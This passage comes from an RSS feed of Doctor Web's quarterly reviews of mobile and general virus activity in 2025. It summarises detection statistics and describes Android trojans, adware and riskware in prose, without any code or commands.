        &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to a shared database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.1.png" alt="Adware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the &lt;i&gt;WhatsApp&lt;/i&gt; messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Youmi&amp;lng=en"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for an unwanted adware module that adds advertizing shortcuts onto the Android OS home screen.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Threats on Google Play&lt;/h3&gt;
    &lt;p&gt;In Q3 2025, Doctor Web's anti-virus laboratory detected over 50 trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; family which subscribe users to paid services. They were distributed under the guise of different software, including messengers, various system tools, image-editing apps, camera apps, programs for working with documents, etc.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;One trojan was hidden in the system-optimizing app Clean Boost (&lt;b&gt;Android.Joker.2412&lt;/b&gt;), and another — in the app Convert Text to PDF (&lt;b&gt;Android.Joker.2422&lt;/b&gt;) for creating PDF documents&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;Moreover, our specialists discovered more fake apps from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family being used in fraudulent schemes. As before, cybercriminals passed off some of them as financial apps, like reference books and teaching aids and software for accessing investing services. Other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans were distributed as games and under certain conditions could load bookmaker and online casino websites instead of operating as promised.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;Examples of &lt;b&gt;Android.FakeApp&lt;/b&gt; trojans disguised as financial apps. &lt;b&gt;Android.FakeApp.1889&lt;/b&gt; offered users the chance to test their financial literacy and &lt;b&gt;Android.FakeApp.1890&lt;/b&gt; the opportunity to develop financial intellection&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;Our experts also discovered &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;—an unwanted app, distributed as software called &lt;i&gt;Zeus Jackpot Mania&lt;/i&gt;. In this program, users could get virtual rewards that they could supposedly convert into real money and withdraw it.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; on Google Play&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;To “withdraw” the money, victims had to give this app some of their data. However, ultimately, they did not receive any payments.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; asks users to provide their full name and information about their bank account&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;
    &lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;
&lt;/section&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15027&amp;lng=en</guid><title>Doctor Web’s Q2 2025 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=15027&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Jul 2025 06:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;July 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, adware trojans from various families remained the most common malware. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojan family were again the most active, despite the fact that users encountered them 8.62% less often. These were followed by &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojans; the number of attacks involving them increased by 11.17%. &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious programs, used in various fraudulent schemes, ranked third; they were detected on protected devices 25.17% less frequently.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        The activity of &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans increased by 73.15%, compared to the previous quarter. 
        At the same time, some other banking trojan families were detected less often, e.g., &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; (by 37.19%) and &lt;b&gt;Android.SpyMax&lt;/b&gt; (by 19.14%).
    &lt;/p&gt;
    &lt;p&gt;
        In April, our virus analysts &lt;a href="https://news.drweb.com/show/?i=15002&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; 
        the public about the discovery of a large-scale campaign to steal cryptocurrency from Android smartphone users. 
        During this campaign, malicious actors hid &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; in a modified version of the WhatsApp 
        messenger and implanted it into the firmware of some budget Android smartphone models. This trojan hijacks messages 
        sent and received in the messenger, searches the Tron and Ethereum crypto wallet addresses in them, and replaces 
        legitimate addresses with ones belonging to the scammers. At the same time, the trojan conceals this substitution, 
        and users of infected devices see the “correct” wallets in their messages. Moreover, &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; 
        sends all images in the &lt;i&gt;jpg&lt;/i&gt;, &lt;i&gt;png&lt;/i&gt;, and &lt;i&gt;jpeg&lt;/i&gt; formats to a remote server to search mnemonic phrases 
        for their victims’ crypto wallets.
    &lt;/p&gt;
    &lt;p&gt;
        Also in April, we &lt;a href="https://news.drweb.com/show/?i=15006&amp;lng=en" target="_blank"&gt;reported&lt;/a&gt; on a spyware trojan targeting Russian military personnel. 
        The &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; malicious program was hidden in a modified version of Alpine Quest mapping software. It was distributed via a fake Telegram 
        channel of an app created by the threat actors as well as via one of the Russian Android app catalogs. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; sent various confidential data to the attackers, including user accounts, their mobile phone number, contacts from the phone book, 
        and information about the infected device’s geolocation and the files stored in its memory. When commanded by malicious actors, the trojan could steal specified files. 
        The malware creators were particularly interested in confidential documents sent via popular messengers as well as in Alpine Quest’s location log file.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, during this most recent observation period, Doctor Web’s virus laboratory detected more threats on Google Play. 
        Among them were various trojans and unwanted ad-displaying software.
    &lt;/p&gt;
    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principal trends of Q2 2025&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans intensified their activity&lt;/li&gt;
            &lt;li&gt;Adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; family also heightened their activity&lt;/li&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans were less commonly detected on protected devices, compared to the previous quarter&lt;/li&gt;
            &lt;li&gt;Decreased numbers of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan family attacks were noted&lt;/li&gt;
            &lt;li&gt;A trojan designed to steal cryptocurrency was found in the firmware of several budget Android smartphone models&lt;/li&gt;
            &lt;li&gt;Malicious actors distributed a trojan that spied on Russian military personnel&lt;/li&gt;
            &lt;li&gt;More threats emerged on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h3&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/01_malware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/01_malware_q2_2025_en.png" alt="Malware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/02_unwanted_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/02_unwanted_q2_2025_en.png" alt="Unwanted_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;    
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/03_riskware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/03_riskware_q2_2025_en.png" alt="Riskware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps in which they are integrated. The APK files launched with the help of this platform can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/04_adware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/04_adware_q2_2025_en.png" alt="Adware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Unwanted ad-displaying software for Android devices that displays a banner showing recommended programs when applications are being installed.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h3&gt;Threats on Google Play&lt;/h3&gt;
    &lt;p&gt;
        Over the course of the second quarter of 2025, Doctor Web’s virus analysts discovered several dozen threats on Google Play, 
        including various fake programs from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family. These trojans were again actively being distributed 
        under the guise of finance-related programs and, instead of the promised functionality, could load fraudulent websites.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/05_Android.FakeApp.1863.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/05_Android.FakeApp.1863.1.png" alt="Android.FakeApp_Q2_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/06_Android.FakeApp.1859.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/06_Android.FakeApp.1859.1.png" alt="Android.FakeApp_Q2_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        &lt;b&gt;Android.FakeApp.1863&lt;/b&gt; and &lt;b&gt;Android.FakeApp.1859&lt;/b&gt; are examples of the trojans that were discovered. 
        The former was hidden in the “TPAO” app and targeted Turkish users who were told that the app could help them 
        “easily control their deposits and incomes”. The latter was disguised as a “financial assistant” (“Quantum MindPro”) 
        and was geared toward a French-speaking audience.
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Games remain another popular disguise for such fake programs. Under certain conditions, they load online casino and bookmaker websites instead of providing gaming functionality.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/07_Android.FakeApp.1840.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/07_Android.FakeApp.1840.1.png" alt="Android.FakeApp_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; (“Pino Bounce”) is one of the fake games that could load an online casino site.
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        In addition, our specialists detected the unwanted ad-displaying software &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;. 
        It was hidden in the &lt;i&gt;“Coin News Promax”&lt;/i&gt; app, which contains informational materials about cryptocurrencies. 
        &lt;b&gt;Adware.Adpush.21912&lt;/b&gt; displays notifications that, when clicked, load into WebView the link specified by the С2 server.
    &lt;/p&gt;
     &lt;div class="flex fxCenter"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/08_Adware.Adpush.21912.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/08_Adware.Adpush.21912.1.png" alt="Adware.Adpush_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;
        To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.
    &lt;/p&gt;
&lt;/section&gt;
&lt;br /&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15026&amp;lng=en</guid><title>Doctor Web’s Q2 2025 virus activity review</title><link>https://news.drweb.com/show/?i=15026&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Jul 2025 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;July 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the second quarter of 2025 decreased by 7.38%, compared to the first quarter. At the same time, the number of unique threats decreased by 23.10%. Unwanted adware apps, backdoors, ad-displaying trojans, and malicious scripts were among the threats most commonly detected on protected devices. In email traffic, most frequently detected were trojan downloaders, various malicious scripts, and trojan droppers.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;
    Users whose files were affected by encoder trojans had mostly encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, and &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;.
  &lt;/p&gt;
  &lt;p&gt;
    In April, Doctor Web’s virus analysts reported on a trojan found in the firmware of a number of Android smartphone models. 
    Cybercriminals used this malware to steal cryptocurrency from their victims. In addition, our specialists discovered a trojan 
    that malicious actors embedded into a version of a popular mapping program; it was used to spy on Russian military personnel.
